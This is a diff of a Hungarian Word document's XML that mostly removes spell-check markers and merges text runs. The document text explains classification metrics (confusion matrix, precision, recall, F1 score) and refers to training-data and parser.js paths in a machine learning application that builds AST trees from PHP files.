-        </w:rPr>
-        <w:t xml:space="preserve"> olyan táblázat, amelyet gyakran használnak egy osztályozási modell teljesítményének leírására olyan vizsgálati adatok halmazán, amelyek ismerik a valós értékeket. Ez egy táblázat, amely négy előrejelzett és tényleges érték kombinációját tartalmazza bináris osztályozó esetén</w:t>
+        <w:t>trix olyan táblázat, amelyet gyakran használnak egy osztályozási modell teljesítményének leírására olyan vizsgálati adatok halmazán, amelyek ismerik a valós értékeket. Ez egy táblázat, amely négy előrejelzett és tényleges érték kombinációját tartalmazza bináris osztályozó esetén</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15286,33 +13735,11 @@
         </w:rPr>
         <w:t>igaz pozitív (</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>true</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>positive</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">true positive, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15347,33 +13774,11 @@
         </w:rPr>
         <w:t>igaz negatív (</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>true</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>negative</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">true negative, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15432,33 +13837,11 @@
         </w:rPr>
         <w:t>hamis pozitív (</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>false</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>positive</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">false positive, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15517,33 +13900,11 @@
         </w:rPr>
         <w:t>hamis negatív (</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>false</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>negative</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">false negative, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15607,7 +13968,6 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -15616,7 +13976,6 @@
         </w:rPr>
         <w:t>Precision</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -15640,14 +13999,12 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Precision</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -15664,47 +14021,31 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>true</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">(true positive) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>és az</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> összes</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>positive</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>és az</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> összes</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>jósolt pozitív</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15716,67 +14057,13 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>jósolt pozitív</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t>megfigyelések</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>total</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>predicted</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>positive</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t xml:space="preserve"> (total predicted positive)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15833,14 +14120,12 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Precision</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -15948,7 +14233,6 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -15957,7 +14241,6 @@
         </w:rPr>
         <w:t>Recall</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -15981,14 +14264,12 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Recall</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -16017,35 +14298,31 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>true</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> (true positive)</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>positive</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>és</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>z összes tényleges pozitív</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16057,19 +14334,79 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>és</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>z összes tényleges pozitív</w:t>
+        <w:t xml:space="preserve">megfigyelések </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(total </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>actual</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> positive)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, tehát a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>helyesen megjósolt pozitív</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> és </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>negatív</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> megfigyelésé</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>nek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> összegének</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> aránya</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16081,130 +14418,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">megfigyelések </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>total</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>actual</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>positive</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, tehát a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>helyesen megjósolt pozitív</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> és </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>negatív</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> megfigyelésé</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>nek</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> összegének</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> aránya</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Recall</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -16342,18 +14563,8 @@
           <w:bCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">F-1 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>score</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>F-1 score</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16377,7 +14588,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Az F1 pontszám a </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -16388,9 +14598,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>recision</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">recision </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>és a</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -16401,7 +14616,67 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>és a</w:t>
+        <w:t>r</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ecall </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>harmonikus</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> átlaga</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>zért ez a pontszám a hamis pozitív</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>o</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kat és a hamis negatívokat egyaránt figyelembe veszi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, valamint </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>sokkal nagyobb súlyt ad az alacsony értékeknek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16409,114 +14684,30 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>r</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ecall</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>harmonikus</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> átlaga</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>, e</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>zért ez a pontszám a hamis pozitív</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>o</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>kat és a hamis negatívokat egyaránt figyelembe veszi</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, valamint </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>sokkal nagyobb súlyt ad az alacsony értékeknek</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve">Ennek eredményeként az osztályozó csak akkor kap magas F-1 pontszámot, ha mind a </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Recall</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve">, mind a </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Precision</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -16718,33 +14909,15 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>\machine_learning_app\</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>machine_learning_app</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t>tanulo_adatok</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -16841,33 +15014,15 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>\machine_learning_app\</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>machine_learning_app</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t>tanulo_adatok</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
@@ -16947,91 +15102,139 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>\machine_learning_app\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>p</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>arser.js</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a grafikus felület által bekért kódra</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ezt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> már automatizálja</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az irodalomjegyzék [11] eleme segítségével</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A PHP fájl</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">okhoz generált </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>AST fák</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\machine_learning_app\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tanulo_adatok</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>\</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>machine_learning_app</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>p</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>arser.js</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a grafikus felület által bekért kódra</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ezt</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> már automatizálja</w:t>
